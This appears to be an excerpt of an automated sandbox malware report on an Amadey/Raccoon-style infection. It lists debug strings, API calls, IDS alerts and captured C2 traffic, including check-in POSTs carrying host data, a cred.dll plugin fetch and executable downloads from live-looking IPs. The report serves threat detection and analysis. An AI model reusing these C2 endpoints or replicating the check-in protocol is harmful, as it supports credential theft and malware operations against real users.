                          Source: Binary string: C:\des.pdb source: sbxGIUIhRd.exe, sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdbl source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbj source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419A51 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00638A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006312E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006314D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00636090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                          Networking:

                          barindex
                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49910 -> 141.8.194.74:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49914 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49930 -> 185.163.204.24:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49941 -> 81.163.30.181:80
                          Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49945 -> 81.163.30.181:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49959 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49962 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 185.215.113.35:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a1b03842422d99b86f413e6a2023f33fHost: 185.215.113.35Content-Length: 95326Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/bd39b08a69ef2a6dac4b951657d49c6ecf7db331 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1Host: 81.163.30.181Accept: */*
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----daabb92f8006f1c30ce11b2370aba5a4Host: 185.215.113.35Content-Length: 96048Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global trafficHTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.35Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
